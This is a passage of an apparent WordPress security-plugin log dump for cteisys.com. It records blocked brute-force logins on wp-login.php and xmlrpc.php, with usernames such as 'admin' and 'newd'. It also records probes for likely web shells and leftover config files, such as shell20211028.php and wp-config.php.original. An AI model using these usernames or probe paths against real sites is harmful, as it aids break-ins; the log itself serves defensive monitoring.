g82w75zWcGPQxV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('83.150.214.18',1402394130,'domadmin123',0,1663849921.9921,51,'qI482uEvogjKJOaPAdNBCrkS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('83.150.214.18',1402394130,'newd',0,1663849920.4196,7,'dKSD4yCOPAxke9MzX687015L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.90.232.106',1734010986,'wwwadmin',0,1663849729.7026,51,'mdDSEiHRy1zIPcn9AJBYg0VG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1663849682.9659,10,'5ZjoKVRqFhQrBXAi07UENd1w','','707|0|0|0|cteisys.com/system_log.php',0,707,0),('152.89.196.13',2556019725,'',0,1663849682.9621,55,'5ZjoKVRqFhQrBXAi07UENd1w','','19|0|0|0|cteisys.com/system_log.php',0,19,0),('152.89.196.13',2556019725,'',0,1663849682.9521,55,'2zUtgqMDCaWGYponl65JfEZ1','','19|0|0|0|cteisys.com/kontol/index.php',0,19,0),('152.89.196.13',2556019725,'',0,1663849477.5376,55,'0djfzVJZs5O461NqaRH3Ebvp','','19|0|0|0|cteisys.com/stats.php',0,19,0),('177.52.160.32',2973016096,'wadminw',0,1663848866.3512,51,'ubZL5xl9Mjh3n4ygPIpGoJN7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1663848667.9237,55,'UjAbz12ZCxRnk4dacHrtXvNo','','19|0|0|0|cteisys.com/cache/ups.php',0,19,0),('61.222.243.149',1038021525,'wadminw',0,1663848607.8589,51,'jwAvWbYkdLX9nJfqIy15amzP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.70.93.152',3628490136,'vernon',0,1663863470.2987,51,'xkCQuTOPE2VNiLq0fwG58FAU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.70.93.152',3628490136,'newd',0,1663863468.3644,7,'3KMhnCuoTtidPjFIESfDJryl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.222.142.146',1138658962,'wwwadmin',0,1663854887.0231,152,'25JcU0BnRZDNCf3MWVXy4gi8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'wadminw',0,1663854250.7276,152,'WKpxRl2iGoSyk0VUIDb9AX6Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'wadminw',0,1663854110.7175,152,'PeYUFqO4ZK2CjxENG70BtcWn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.147.193',2671875009,'newd',0,1663853653.1547,152,'u9cDrdtl4VSGEiQFsBoqCNxL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1663853143.3635,152,'9JgprP7DxbyemjQMTs08I5Nf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1663852980.1034,152,'p4xh8vFKeWwu7kYiGOnM2B0T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.127.239.132',3162500996,'rootuser',0,1663852680.2362,51,'3JKSqEAvIjQ8ZfzmM0uCD4c2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.127.239.132',3162500996,'newd',0,1663852677.1809,7,'OfCGR28AVQDhxm7BWwrFl4cI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.210.66.35',533873187,'admin',0,1663852375.7602,152,'V0BehtxlAKE518RQ2aLkvs6M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.147.193',2671875009,'admin',0,1663851901.1051,152,'5V0SoClvbJdjf3rQNU7IwyEe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'admin',0,1663851737.4548,152,'yXkUMlFoqAtag1d4BK7h98Yz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.150.45',2335938093,'admin',0,1663862818.6167,51,'cPWVxvBuyzbm9G7ZwItMHaoq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.41.19',2388470035,'admin',0,1663862789.8543,51,'5xK4U2RILs3fG6QJd7nCrMpA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1663861115.7764,152,'LBnxejlMOygCAShZ4p6siTIR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1663860964.4567,152,'RImUQC0u5hgXoABxH198jn2p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.69.154.241',3108346609,'zhihua',0,1663860343.9137,51,'DkeQ9Li8UwTVhGC30n6ju4Km','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1663858560.1774,152,'HITMunsJPiKAhXDp0eL21lWB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.77.125.145',760053137,'newd',0,1663858338.1317,7,'3JuhnCRaZlmE1NP24I5KzfxD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.157.235',90545643,'learner',0,1663858050.1052,51,'38Ue1jxKWCkrHs6fgzhLbJE2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.157.235',90545643,'newd',0,1663858048.3904,7,'2HUWERwQp93zGIuOvc5fiLdy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'admin',0,1663857913.4951,152,'c6lLFTrwfEmp1bV5SN3vnXiK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'admin',0,1663857772.3710,152,'u3QiLn729yPZAtsIBlJM5pVS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.111.225.89',1601167705,'admin',0,1663857136.5469,152,'ke4yAhoZi2T9rwOMadI5s1Uu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.1.211.12',3556889356,'test',0,1663855775.9611,51,'yrJCVm7IA9PzuYkcWBLgsXjt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.1.211.12',3556889356,'newd',0,1663855774.9572,7,'NdLz41VlxZkORjWtB6SmgYsI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.42',1736628778,'marine',0,1663855331.2646,51,'MV3vD0d2oCIjaLRQBtZEX6Un','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.42',1736628778,'newd',0,1663855324.4210,7,'dEXrAOoaNqmy15GHnTWeipRl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.69.154.241',3108346609,'newd',0,1663860342.3426,7,'vWh0FNVkUtIb5Y34BzHowrsn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.209.0',2487800064,'newd',0,1663860319.0527,152,'sfKoThyZDB2x9rn1mNUIFa8M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1663859680.8101,152,'bmIx3BXJn8KaEd2l1NjWu4UG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.119.2.80',2826371664,'administrador',0,1663859629.8830,51,'S4lf3qaQYZnRtDUOpPeN7oWL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('168.119.2.80',2826371664,'newd',0,1663859628.1858,7,'cUlYgEQHsp1RyN5IejS3xWPJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.59.224',2727361504,'Admin',0,1663859516.0766,51,'jMPcsgAxbhtamQvZuXWL4oR2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.59.224',2727361504,'newd',0,1663859512.2582,7,'F3UN4kR2IxKPc5QoEOYprhyS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.237.65.250',1592607226,'steve',0,1663859268.7667,51,'lGDJIBWfZXku7bKO84H9dM3L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.237.65.250',1592607226,'newd',0,1663859267.1401,7,'pezk3PqCYLy2rMXn51m6tSwN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1663859231.9299,152,'bCBeVloKOnErqkm0GuWI1jyY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1663895188.2779,7,'LJ2hlrmU6GYe90PV1C87qOoF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1663898517.4986,152,'4WuXHMdzKSDkPlE9xV0wCJU2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.243.118.43',2297656875,'newd',0,1663898664.9829,7,'5D8gNucIj2hQZYado7KEizsA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1663906496.0824,7,'zHUaDuhjvNwGJFRT136yik85','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.0.140.186',2634058938,'wadminw',0,1663932962.7548,51,'BLaFbvP9yOwIWcq5QhYrZxfl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.227.251.154',1139014554,'newd',0,1663932404.9668,7,'0wxi8g7UEqT4ejNlHRJY3ZzW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.85.224',2335921632,'newd',0,1663931912.3080,7,'FzPyYqp1sjCh7fN4rIlXSU86','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1663931209.8065,7,'klMvOUba8hgrCYZsnyHRQ37W','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.111',2388493423,'newd',0,1663941773.4439,152,'y0oF2OM8nUEYSIju1crN6JTv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.235',3583556587,'joyce',0,1663946120.1778,152,'JcCKPbjpQ5qvnTfoUGwIk80L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1663945762.1990,152,'xhipMkrFVAcaRZNu0d38USzY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1663945325.6933,152,'0jakOcTeNL9YXDUvKFob2w3J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.93.182.171',3109926571,'joyce',0,1663945230.0230,152,'8ZqYihDNvE3cTCJUBujd0fKe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.116.44.97',24390753,'newd',0,1663954894.8344,152,'qIV3O9epRoEjDH2J4k6SlhCK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('140.246.255.164',2364997540,'newd',0,1663954579.7227,152,'TUvuj9HaLkVrSp27NBZ5Xdti','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.222.127.109',2094956397,'newd',0,1663953950.9354,152,'jGgahlfREbsWX1xpzkuic7nA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.201.0',2388510976,'newd',0,1663953616.7633,7,'XiI7ehDMCmoA0TzrQa9gpFEl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.159.35',3265503011,'newd',0,1663953611.4399,152,'h1gdYu2fCTnJ9RxA7wb6MBOm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.105.73.13',795429133,'newd',0,1663953594.2768,7,'0dMcvXkPRb3ugWKjBlHeZEwC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1663953264.9434,152,'3aZRIOPsDzM9uQyhHcTJdB1b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.163.52',3165037364,'newd',0,1663952933.0709,152,'riMupj1TXWOvZYCJ2yBAgR4V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1663952612.9164,152,'KbaonWs2lONLvCU1EXuH8Tqf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1663959773.8210,152,'ShLmE61F5R9eH0GXBZbjcWnC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1663986340.6165,55,'vE5Lx6wkmQ4IYjAiUOW7ndG8','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('72.167.34.14',1218912782,'newd',0,1663985077.3030,7,'l6yr7G9qTvSZI3dmwcBeAxzo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1663986335.4557,55,'dXflOCsqgPTIukN8bJSxjK4z','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('161.35.126.102',2703457894,'newd',0,1663999782.8591,7,'lbWQ2TR9NnGYpwg7HXLJcuCU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664013674.2593,152,'jBE9vOGaeprqKw817AWuFSUL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.209.117',2310590837,'newd',0,1664064344.1003,152,'ZMp6nYkCrjfeUwVR9L0OKodX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.24.106.172',1981311660,'newd',0,1664093008.8036,7,'t7S09HaZIkwRdiUKNpn24yxg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1664105257.0164,7,'m1kadGcFRrZ064ELT385ihUf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1664102961.2964,7,'932Nk8pa7LKfMnE6Wo1tuBeP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1664102148.8340,7,'ktiYhEopxQNFW4B9SJzRc6f2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1664101411.6110,7,'9zIm2rfw7Ag1K40OshbGidoY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1664104509.7845,7,'tfk2lALP9RcbaGK6eJXU5Vvw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1664103710.9211,7,'fGdbg2NDzR8xC516M47LE3it','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1664109882.3115,7,'6gDcsK0lbFOQHV4M7anUpZ1q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.94',3583550046,'joyce',0,1664109422.9413,152,'xe3ojtmWGTVRludrhpS2gJsU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.81.59.92',223427420,'newd',0,1664109181.4796,7,'neaw6HqEd5CIh30OMWFmV8kX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1664108330.5180,7,'RD6Iva5mkYCUru2J4iZ3wonj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1664107614.8523,7,'h1rdgFozZMcENlWGSf73puYm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1664113814.4775,7,'z9cP7v4ZKEpfnBgUSYi3Nmot','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.251.134.195',737904323,'newd',0,1664112270.0174,7,'BH2nKEclOdMzhisGQrZvPDk4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.180',3091979700,'joyce',0,1664111588.5911,152,'yez2tQRT6LVhfU4vgFC3cxpw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.46.234.202',3475958474,'newd',0,1664111444.5106,7,'tuIdKmS7n1bPFcvelwO3QpoB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.195.148.190',868455614,'newd',0,1664115375.3602,7,'o5dJR7qOGupkg9wxyKcEt34n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664115030.1138,55,'6bUsComESTBLZtWYkv1zfadc','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('57.128.45.42',964701482,'',0,1664115016.5780,55,'gOxBApECd4YnVylZb8Gh1c5u','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('103.130.218.189',1736628925,'newd',0,1664114552.8495,7,'25tHiWoALXPDJ6Mv4VaUQ7pw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.181',3583550133,'joyce',0,1664120912.9512,152,'H2zp6OToBJxA3LNckiuMKatw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.105.73.13',795429133,'newd',0,1664120071.6599,7,'Zhb65f9kXdTjpeH081uIDtoa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.25.104.120',2014931064,'newd',0,1664119252.5519,7,'56uZTt90E4VcSqrfGJnFz1XI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1664118511.8012,7,'X9FxZe43OQIunCvcDkpyfAgB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.118',3583549814,'joyce',0,1664125106.8960,152,'IZLesF5nykHGgOob7pmUq3D0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.15.183.168',856668072,'',0,1664122109.4088,55,'4BZj5YLd92arsyhQTeCbulgk','','19|0|0|0|cteisys.com/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('37.115.114.47',628322863,'',0,1664153701.3410,55,'5CkoeaLZv7RjBds1Oh9u4c0Q','','19|0|0|0|cteisys.com/wp-config.php.original',0,19,0),('35.194.233.240',599976432,'newd',0,1664153171.1968,152,'a53CuOycL1Z8GMqKYQmp6Tse','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1664152604.4360,55,'4fMCaNFSE5i9cvp6GkmTeLUg','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('57.128.45.42',964701482,'',0,1664152599.5574,55,'tPzmbF5HWJ368Dgr0ikxCYj2','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('213.152.161.240',3583549936,'joyce',0,1664126472.6969,152,'zNAMvjFWr5eXdUPysa0n27Dh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.43',3114053419,'joyce',0,1664130800.6745,152,'vnsIzQuUq4CFidftBVmOHN8j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.32',3355043360,'joyce',0,1664130306.5850,152,'vnagsoLMK9uIQmYCB2lX1fVS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.84',3583550036,'joyce',0,1664130118.6087,152,'BybZY42SXuswh9F3MmpOkHf0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.58.127.244',3325722612,'newd',0,1664149957.1610,152,'UbDHgJYV7lq9nBA3cvu6SEOG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.166',1046910118,'joyce',0,1664149346.3293,152,'8hJtnl3GTpK0xoCIdZviPRYg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664149121.2602,152,'Te6iGhcWpvDrBZlOEb84L1aX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1664147508.7173,152,'kJSKVxlQ04wWIyjXZqARDM5z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664148311.6941,152,'mlSPdtpizr8Oejxy3RVWZqa1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1664146681.3536,152,'rmVpJl8HiKs9FjxzBMObGADQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.207.102.163',1540318883,'joyce',0,1664145995.0987,152,'eEqtGbfN8YLls1mzrhnZoHwd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.224.23.225',1541412833,'newd',0,1664145899.2070,152,'zuYirNoWqFSydklKw7sXLQRD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.35',3114053411,'joyce',0,1664135937.4807,152,'wZmytUJoiReqsjTWN4cL1vVK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.18.50.22',2500997654,'newd',0,1664142778.1672,152,'px0ZlTPoIKBafw7QEzmVWh4t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.25.74',1728584010,'admin',0,1664142041.6610,152,'HNeOToywJc1YCrsi7zVtPXnZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'admin',0,1664141314.6784,152,'F1xmLgPGf5eiVHlsXpohtrSI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.5',3583549701,'joyce',0,1664138337.6183,152,'lbyYJZAXzNGMBnSQHwKVErIP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1664145081.7518,152,'pceInXm236vMKWAqLblPUSdY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.228.23',2335958039,'newd',0,1664143537.9286,152,'TAUinWFjeKkgZ6ovMm2H71Cs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1664144291.4172,152,'kygPU8jAOou5rJK63lBHZGeL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664150743.3721,152,'rfUREmdxiI41wBeFYSokLV39','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.205.46.185',734867129,'newd',0,1664152367.9344,152,'JIMvWeob2Xyxcpu1fq3A8wCY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.254',2487809278,'newd',0,1664154015.3963,152,'e9myW083UuA6PvXhQgdpxwSr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.131.126',1109230462,'newd',0,1664154841.0977,152,'stR2VyFPkQnOxUBiMEWjpAfr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1664158125.0574,152,'NbU4JLT3BtP7QVeFMhapzACI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1664162046.9077,152,'BZE8IjMy7N4UbXPf6JpTOtrL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664161508.3003,152,'ZxvatskAjeI7mXW4Sud68cpD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.23.131',1382422403,'joyce',0,1664161541.0541,152,'OheNXCtwYaRGk4pg7VqFH9oB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1664167148.2952,152,'8IoRM5Wqlg3jdDvHkZVbzrua','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664166301.1205,152,'Ccjd2HyKsxpDuPmtValGheRN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1664165441.4770,152,'f1qjGhFbLyXpS6koKmWOsari','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664170569.7804,152,'Lt8NAMrxhle0KDRvgmBEc7wI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664168863.8763,152,'1NxRUkLDVKFwZfn3Ts2XM4Bu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664169693.8030,152,'Y50qGJftHeR3vl2m4zdEKFoZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('140.143.188.163',2358230179,'newd',0,1664176730.5741,152,'tnYE6PNidqlcp2hab8KsyO04','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1664177360.7877,152,'tT9WQbfGpFDVjwSMaLnqBRId','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1664175932.9454,152,'Hi5rCumyVwE1TItJopBsj7Q4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.185.81.201',3233370569,'newd',0,1664181093.4423,152,'OqZNbQH6I4M9J5thEaY72pyF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1664179829.7536,152,'p67DyBe4MAZ51knvrbTfz2Gi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1664180267.9131,152,'u7J9QrCRokLiTqzlZOwfXA81','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.194.233.240',599976432,'newd',0,1664179451.3372,152,'riaQ53EuUefsLSCZFBgp2G46','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('186.234.80.121',3135918201,'newd',0,1664185844.1650,7,'bngpY7ycKNVUH5wJ1DdtRIxf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('87.107.144.155',1466667163,'newd',0,1664185250.1967,7,'sfji0LDOk6YFH7VWx8aAQ9Kd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.149.103.132',3583338372,'newd',0,1664184549.5101,7,'baJFvjzpk6o9Ld8yNBCRQiP2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664183877.1968,7,'Qy8L4sTkgO6EmYdhZ91jHFnV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.160.166.188',3651184316,'newd',0,1664183168.8414,7,'hXaF7AC1l8dysZKnxw3pV0jq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.149.124',3497104764,'newd',0,1664182955.2285,152,'IhF9jtRZof1ncUHK5GC6z3Pa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.149.103.132',3583338372,'admin',0,1664190922.8072,51,'4l0FAwT3LIQK8zaGVNRUW5kp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.245.215.122',3639990138,'admin',0,1664191570.1497,51,'M0Op2BlcjhLSmd3eK7zwTX1D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.32.211.172',2552288172,'newd',0,1664190257.6619,7,'w40skozPI6u2LAWaDmcGEjUJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.0.216.181',2717964469,'wwwadmin',0,1664196365.2234,51,'QOBlcder7oMymxiDzGhwL4n8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.53.17',1364735249,'wadminw',0,1664195694.8870,51,'aYIrW9XvZHhCqFmORnlTNyVA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.139.178.177',2475406001,'admin',0,1664195436.4051,51,'CfD1OQ4thpFkwm6PgTKiAjSu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.211.94.153',601054873,'admin',0,1664194760.4404,51,'1r76JAhInBPvEqXRwaH5xDdp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.125.239.179',763228083,'admin',0,1664194120.0881,51,'vlOeAaTkbZwFCtRHE14qG962','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('90.156.169.12',1520216332,'wwwadmin',0,1664197396.2455,152,'JTIhALKGVpauNEvMbqYU9ZjH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.184.67.138',45630346,'newd',0,1664207744.8951,152,'QhCK7rHXeRpJ8vWFlsxMkdS1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.251.154',1139014554,'newd',0,1664206495.4127,152,'IOVaN6Rv0py8Wjf4eEdcsbCr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1664206930.9773,152,'azyRC0UGdMHWe2qcDQIAf3YF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.45.127',2650090879,'newd',0,1664206080.6627,152,'smjfUzLAH2PEnq8SgyTdY14B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1664205224.6647,152,'iJ12naPVtmMWGKRHX3FjLkhD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.97.173.182',3512839606,'newd',0,1664204803.9857,152,'1zuTRDbfr0dgA4GaYymnWU7h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664208352.0788,7,'H51QxERJngzCaKO2NPL3phFB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.43.127.191',1697349567,'newd',0,1664208152.8817,152,'Zx9LMWp6X4IsBqv2GPhQF5bf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.15.189',860557245,'newd',0,1664214269.1566,7,'UmyfHTlNre461wJz3kIF9Y8P','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.195.148.190',868455614,'newd',0,1664213296.4268,7,'xI2XjclLVNtZ7wF90TkvQ4W1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1664212295.4479,7,'dyUC1z0AIfO6rwFlB5cKHbLD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664216226.1254,55,'x81CRZFMQUyvliHPNqDzG